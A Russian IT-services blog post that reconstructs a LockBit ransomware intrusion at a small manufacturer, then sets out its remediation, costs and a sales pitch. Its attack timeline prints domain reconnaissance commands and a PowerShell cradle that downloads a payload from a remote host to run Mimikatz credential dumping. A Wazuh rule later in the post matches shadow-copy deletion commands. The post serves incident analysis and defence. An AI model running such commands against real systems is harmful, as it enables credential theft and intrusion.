LockBit в малом бизнесе: разбор атаки и защита
· 16 мин чтения

LockBit в малом бизнесе: разбор реальной атаки и защита

LockBit в малом бизнесе: разбор реальной атаки и защита

Представьте: январь, обычный понедельник. К нам обратилась производственная компания из Подольска — 38 рабочих мест, свой цех, ну и, конечно, офис. История, доложу я вам, до боли стандартная: люди приходят на работу, а тут сюрприз! Половина сети наглухо зашифрована. Виновником оказалось семейство LockBit Black. Что ж, давайте разберёмся, как эти «гости» пробрались внутрь, чем занимались целых 5 дней до самого шифрования. И почему старый добрый совет вроде «просто купите антивирус» сегодня уже совсем не работает.

Кстати, меня зовут Евгений Семёнов. Я руковожу ITfresh аж с 2010 года. За последние два года, скажу вам честно, моя команда разбирала одиннадцать похожих инцидентов. Все они были связаны с LockBit или его многочисленными клонами. Так что этот кейс — не пустая теория, а самый настоящий пересказ нашей post-incident-сессии. Мы буквально пошагово восстановили картину по логам.

Кто атакует малый бизнес и зачем

Ещё до 2021 года ransomware-группы обычно охотились на крупняк, на так называемый энтерпрайз. Атака считалась стоящей, если выкуп тянул хотя бы на полмиллиона долларов. Но сейчас всё изменилось, и очень сильно! Модель RaaS сделала такую атаку до смешного дешёвой. Просто невероятно.

Получается, что даже атака на офис из 30 человек теперь вполне экономически целесообразна. Малый бизнес, увы, стал для них законной добычей.

Клиент и инфраструктура

Итак, что мы имеем? Производитель упаковки, 38 человек: 22 в офисе, 16 на цехе. Серверная база, как это часто бывает, весьма скромная.

И вот она, главная засада: подрядчики имели полноценный VPN-доступ во внутреннюю сеть. С правами обычного пользователя домена! Никакой MFA, никакой сегментации. Просто открытая дверь.

Реконструкция атаки по логам

Когда меня наконец позвали, 31 рабочая станция и все серверы уже были зашифрованы. Я решил, что начинать с восстановления — самоубийство. Сначала — детальная форензика, то есть расследование. Я собрал все возможные артефакты с двух уцелевших машин (просто повезло, что их выключили на выходные). Поднял виртуалку со всеми журналами Windows. Экспортировал логи Mikrotik и Veeam. Деталей, поверьте, было предостаточно.

День -7: первичный доступ

Вторник, 02:14 ночи. На VPN-сервере Mikrotik залогинился пользователь contractor_buh с IP-адреса в Молдове. Это была учётка бухгалтерской фирмы. Подрядчик впоследствии подтвердил, что в начале января у них через спам-рассылку был отжат ноутбук бухгалтера, на котором сохранялся пароль от VPN клиента в Outlook-заметке.

Злоумышленники пробрались в инфраструктуру, притворившись легитимным партнёром. Представляете, никаких алертов! Ведь это была самая обычная учётка. Да, время логина для бухгалтера было, мягко говоря, ненормальным. Но, увы, кто же мониторит, кто и когда входит в систему?

День -6: разведка

В первые сутки атакующий вёл себя на удивление тихо. Всего несколько команд. Он просто осматривался, пытаясь понять, куда вообще попал и что тут к чему.

whoami /all
net user /domain
net group "Domain Admins" /domain
nltest /dclist:
ipconfig /all
arp -a

Эти команды, кстати, обычно не вызывают подозрений в стандартных системах мониторинга. Но вот Wazuh при правильной настройке — совсем другое дело. Он детектит такой паттерн как Discovery Phase MITRE ATT&CK T1087.

День -5: повышение привилегий

Дальше атакующий запустил BloodHound (использовав SharpHound для сбора данных домена) и весьма ловко нашёл путь к доменадмину. Оказалось, сотрудник цеха имел учётку с правами локального администратора на машине сисадмина. Типичный недосмотр, конечно: раньше так было «просто удобнее всё настраивать». Ну а сам админ, «по старинке», хранил пароль доменадмина прямо на рабочем столе. В Notepad++. Отличный способ, правда?

Через psexec и crackmapexec атакующий ночью получил локальный доступ к этой самой машине. Что дальше? Выгрузил LSASS, расшифровал хеш, и вуаля! Пароль доменадмина у него в открытом виде. А Mimikatz, внедрённый в виде PowerShell-инжекта, легко обошёл базовый антивирус Defender. Всё потому, что он был хитро обфусцирован с помощью Invoke-Obfuscation. Изящно, не так ли?

# Упрощённый пример того, как выглядел запуск:
$b = (New-Object Net.WebClient).DownloadString('http://[REDACTED]/i.txt')
$d = [Convert]::FromBase64String($b)
$a = [System.Reflection.Assembly]::Load($d)
[Mimi.Program]::Main(@('sekurlsa::logonpasswords','exit'))

День -4 и -3: боковое движение

Используя WMI и WinRM, атакующий обошёл всю сеть. Идентифицировал серверы. Нашёл два самых важных места. Его стратегия была чёткой.

Он не стал торопиться сразу что-то портить или шифровать. Сначала выгрузил себе самое «вкусное»: файлы клиентов, договора, базу 1С dt. Всё это ушло через Cloudflare-туннель, искусно замаскированный под обычное обновление Chrome. Классика double extortion, знаете ли: сперва воруют данные, потом шифруют. И если жертва не платит выкуп за расшифровку, украденное просто публикуют. Ничего личного, просто бизнес.

День -2 и -1: персистенс

На пяти машинах атакующий успел установить скрытые механизмы возврата. Просто на всякий случай.

Представьте: злоумышленник выпускает "Golden Ticket" прямо на вашем контроллере домена. Это, по сути, поддельный Kerberos-билет, который даёт ему вечный доступ от имени *любого* пользователя. Понимаете, насколько это опасно? Даже после того, как мы сменили абсолютно все пароли, атакующий легко мог бы вернуться. Ключ к безопасности здесь — сбросить хеш krbtgt дважды, иначе проблема осталась бы.

День 0: шифрование

Воскресенье, 23:42. Представьте эту картину: атакующий, используя групповую политику (GPO) и её часть "Computer Configuration → Preferences → Files", тихо и незаметно раскидал исполняемый файл LockBit по временным папкам *всех* машин домена. Что дальше? Он запустил его одновременно везде, активировав запланированное задание с триггером "немедленно". Всего 22 минуты, и все доступные носители оказались зашифрованы. Почти все! Уцелели лишь офлайн-картриджи в сейфе и, по невероятной случайности, один RDP-сервер — он просто рухнул от перегрузки CPU и не успел довести дело до конца. Повезло!

Почему классическая защита не сработала

А что, собственно, было у клиента? Ну, стоял Windows Defender — бесплатный, конечно. Пароли по политике были всего-навсего из восьми символов. И, да, имелся какой-то антифишинг в почте. Выводы? Как вы уже догадались, этого явно оказалось мало. И сейчас мы расскажем, почему именно.

Что мы внедрили после инцидента

Как только мы закончили с восстановлением (кстати, это заняло четыре напряженных дня, и про это я обязательно напишу отдельный рассказ!), сразу же полностью перестроили весь защитный контур.

1. EDR с поведенческой аналитикой

Мы внедрили ESET Inspect Endpoint Protection, а для надёжного дублирующего мониторинга добавили Wazuh-агент. Как это работает? Wazuh собирает все события в SIEM, а ESET полностью закрывает вопрос безопасности на конечных точках. Кроме того, мы, конечно, тщательно настроили правила детекта под самые типичные тактики, техники и процедуры (TTP) LockBit.

<rule id="100501" level="12">
  <if_sid>60103</if_sid>
  <field name="win.eventdata.commandLine" type="pcre2">
    (?i)(vssadmin\s+delete\s+shadows|wbadmin\s+delete\s+catalog|bcdedit\s+/set.+recoveryenabled\s+No)
  </field>
  <description>Ransomware: попытка удалить теневые копии и отключить recovery</description>
  <mitre>
    <id>T1490</id>
  </mitre>
</rule>

2. MFA везде, где есть удалённый доступ

VPN, RDP, веб-почта, любой админский вход — абсолютно везде теперь действует Microsoft Authenticator или, как запасной вариант, TOTP из KeePassXC. На Mikrotik мы всё это реализовали через связку Radius+freeRADIUS+PrivacyIDEA. А как быть с подрядчиками? Они получают одноразовый код через Telegram-бот, но только после согласования с ответственным менеджером. Никаких исключений!

3. Сегментация и DMZ для подрядчиков

Теперь для подрядчиков всё максимально строго: они заходят только в отдельный VLAN и видят лишь тот RDP-jump-сервер, где им разрешено работать. Сам jump-сервер при этом тщательно логирует каждое их действие через Apache Guacamole, записывая всю сессию прямо в видеофайл. Забудьте о прямом доступе в продакшн! Всё теперь под нашим полным, строжайшим контролем.

4. LAPS и тейринг

Мы внедрили Microsoft LAPS, и теперь он автоматически меняет локальные админские пароли каждые семь дней — причём на каждой машине они абсолютно уникальны. Но это ещё не всё! Мы разделили доменадминов на три чётких уровня. T0 — допуск только к контроллерам домена (DC) и Hyper-V. T1 — к серверам. T2 — исключительно к рабочим станциям. У каждого уровня — свои учётки, и они могут подключаться только к "своим" объектам. Такой подход напрочь рушит классический сценарий "украл хеш админа со станции — захватил DC".

5. Иммутабельные бэкапы

Для максимальной защиты мы настроили Vault repository в Veeam, который крутится на отдельном Linux-сервере. Доступ к нему по SSH? Только с админского ноутбука и *только* по ключу. Все бэкапы надёжно блокируются immutable-флагом на 30 дней — никто не сможет удалить или изменить их! И это ещё не всё. Еженедельно делаем экспорт на LTO-7 ленты. Эти ленты, кстати, тоже меняются раз в неделю, а старая сразу уезжает... куда бы вы думали? В банковскую ячейку! И вся эта крепость обходится клиенту всего в 4 тысячи рублей в месяц.

6. Application allowlist

Через WDAC (Windows Defender Application Control) запретили запуск любых исполняемых файлов из путей %APPDATA%, %TEMP%, %USERPROFILE%\Downloads для рядовых пользователей. Это закрывает 90% пейлоадов, которые пытаются запуститься из этих папок.

7. Обучение сотрудников

Раз в квартал мы обязательно проводим фишинговые рассылки изнутри компании, используя для этого GoPhish или KnowBe4. А после каждой такой "проверки" — часовой разбор всех кейсов. Хотите знать результат? После трёх таких итераций процент кликов по подозрительным ссылкам упал с 31% до *всего* 4%! Невероятно, правда? Цифры говорят сами за себя.

Сколько это стоит

КомпонентРазовые затратыПодписка/мес
EDR (ESET / Kaspersky) на 40 endpointот 9 600 ₽
Wazuh (open-source, наш развёрт)45 000 ₽
MFA (PrivacyIDEA + бот) на 50 пользователей30 000 ₽
Сегментация и DMZ (работы)60 000 ₽
Veeam Hardened Repository (сервер + работы)140 000 ₽
LTO-картриджи + банковская ячейка28 000 ₽4 200 ₽
Аккаунт-менеджмент, обучение, аудитот 18 000 ₽
Итого~303 000 ₽~31 800 ₽/мес

Просто представьте масштабы потерь: оплата выкупа в том самом инциденте требовалась в 80 000 долларов, а это, между прочим, примерно 7.5 миллиона рублей! Но и это ещё не всё. Четыре рабочих дня простоя, пока мы восстанавливали системы, обернулись для клиента примерно в 2.8 миллиона рублей упущенной выручки. Итого? Один лишь защитный контур окупился бы просто в 30 раз! Вот так-то.

Индикаторы компрометации, которые должны были сработать

А знаете, если бы у клиента тогда был SIEM, эту атаку можно было бы запросто поймать минимум на четырёх этапах! Каждый такой этап давал бы нам солидное окно для реагирования: от нескольких часов до нескольких дней. Упущенная возможность? Однозначно.

И что самое приятное: каждое из этих правил детекта можно внедрить всего за час-два. А лицензионных денег это не будет стоить *ни копейки*, если использовать связку Wazuh + Sysmon с конфигом от SwiftOnSecurity. Просто и эффективно!

Главные мысли для собственника

  1. Запомните, безопасность — это не покупка одного чудо-продукта. Это многослойная, прочно связанная система. Антивирус не имеет смысла без MFA; MFA бесполезно без грамотной сегментации сети; сегментация не спасёт без надёжных бэкапов; а все бэкапы могут оказаться под угрозой, если сотрудники не обучены. Всё взаимосвязано!
  2. Подрядчики — это всегда особая зона риска для вашей IT-инфраструктуры. Ваш договор просто обязан четко требовать от них не только многофакторную аутентификацию (MFA), но и проведение регулярных пентестов. Без этого вы открываете дверь для лишних проблем.
  3. Резервный сервер — это не просто копия, это ваша последняя линия обороны. Знаете, где он должен быть? Исключительно вне домена, и обязательно с иммутабельностью. Это критически важно, чтобы злоумышленники не смогли дотянуться до него, если прорвутся в основную сеть.
  4. Больше двадцати рабочих мест, а SIEM так и не внедрили? Знаете, это как пилот, который летит вслепую — без приборов, без понимания ситуации. Поверьте, это не шутки, это огромный риск для вашей безопасности. Но решение есть, и оно доступно: облачный или self-hosted Wazuh. Этот инструмент поможет всё увидеть, и стоит это всего 50–70 тысяч рублей разово. Разве прозрачность и безопасность не стоят такой инвестиции?
  5. Давайте посмотрим на реальные цифры: RTO (время восстановления) в 18 часов и RPO (допустимая потеря данных) в 6 часов. Для среднего офиса это вполне рабочий, достижимый уровень. А вот если вы понятия не имеете, какие у вас RTO или RPO, то, к сожалению, в вашей системе они автоматически приравниваются к бесконечности. Это значит, что после инцидента можно ждать чего угодно, и очень долго.
  6. Вот вам простой, но суперэффективный совет: тренировки по реакции на инциденты. Проводите их хотя бы раз в полгода, и пусть это будет в формате tabletop. Что это значит? Всего час, четыре ключевых участника, а сценарий максимально реалистичный: 'Представьте, что всё зашифровано, и это случилось поздно вечером в пятницу. Ваши действия?' Поверьте, такие 'мозговые штурмы' показывают все дыры в ваших планах и процедурах намного быстрее, чем самый дорогой пентест. Это действительно работает.

Бесплатный аудит инфраструктуры от ITfresh

Я готов приехать к вам в офис на 2 часа, чтобы бесплатно посмотреть, как у вас настроен AD, бэкапы, доступ подрядчиков и фаервол. По итогам пришлю подробный отчёт с приоритетами и сметой. Это предложение для компаний от 10 до 50 рабочих мест в Москве.

Telegram: @ITfresh_Boss
Телефон: +7 903 729-62-41

Часто задаваемые вопросы

Что такое LockBit и почему его боятся?

LockBit — это не просто вымогатель, это целое семейство ransomware, работающее как полноценная RaaS-платформа, то есть "Ransomware-as-a-Service". Как это выглядит? Аффилиаты просто покупают готовый билд и спокойно начинают свои атаки, а "ядро" банды, разумеется, забирает себе 20-30% от полученного выкупа. А вот самое страшное: даже атака на всего 30 рабочих мест уже экономически выгодна для них. Понимаете? В этом и кроется основная угроза для малого и среднего бизнеса (SMB).

Сколько времени проходит от проникновения до шифрования?

От 18 часов до целых 11 дней, при медиане в 4 суток — вот какое окно для реагирования у вас есть. Это *ваш* шанс на детект, но только при наличии SIEM с грамотно настроенными правилами. Успеете?

Как подрядчики становятся точкой входа?

Представьте жуткую ситуацию: у вашего подрядчика угнали ноутбук. Или, что не менее страшно, кто-то узнал его VPN-пароль. Как же защитить свои данные? Мы в ITFresh настаиваем: подрядчики должны подключаться строго через изолированный DMZ. Обязательно внедрите многофакторную аутентификацию (MFA)! Все доступы давайте временно, а каждую сессию тщательно аудируйте, например, с помощью Apache Guacamole или Teleport. Это не прихоть, а насущная необходимость.

Поможет ли антивирус против LockBit?

Базовый антивирус? Нет, серьёзно, об этом можно забыть. В наш век он уже просто не работает! Современные киберштаммы стали слишком хитрыми: они активно применяют полиморфизм и обфускацию, постоянно меняя свой код. Сегодняшним реалиям соответствует только EDR-решение с глубоким поведенческим анализом. Можем порекомендовать такие проверенные варианты, как Defender for Endpoint, Wazuh, Kaspersky EDR или ESET Inspect.

Сколько стоит пакет защиты от ransomware для офиса 30 человек?

Разовое внедрение надёжной системы безопасности может показаться крупной тратой — от 250 до 600 тысяч рублей, тут всё зависит от того, в каком состоянии сейчас ваша инфраструктура. Но давайте посмотрим на подписки: это всего 8-18 тысяч рублей в месяц. Подумайте об этом! Это в 50-100 раз меньше, чем вы потеряете за один-единственный день простоя из-за кибератаки.

Подпишитесь на рассылку ITfresh

Мы готовим для вас еженедельные практические гайды. Это настоящая находка как для руководителя IT-отдела, так и для сисадмина! В них — всё самое актуальное: свежие новости безопасности, тонкости работы с 1С, успешные стратегии миграций, нюансы резервного копирования и, конечно, лайфхаки, проверенные нами в реальных проектах.

Реквизиты оператора персональных данных

ООО «АЙТИ-ФРЕШ», ИНН 7719418495, КПП 771901001. Юридический адрес: 105523, г. Москва, Щёлковское шоссе, д. 92, корп. 7. Контакт: info@itfresh.ru, +7 903 729-62-41. Оператор обрабатывает e-mail подписчика в целях рассылки информационных и рекламных материалов до момента отзыва согласия.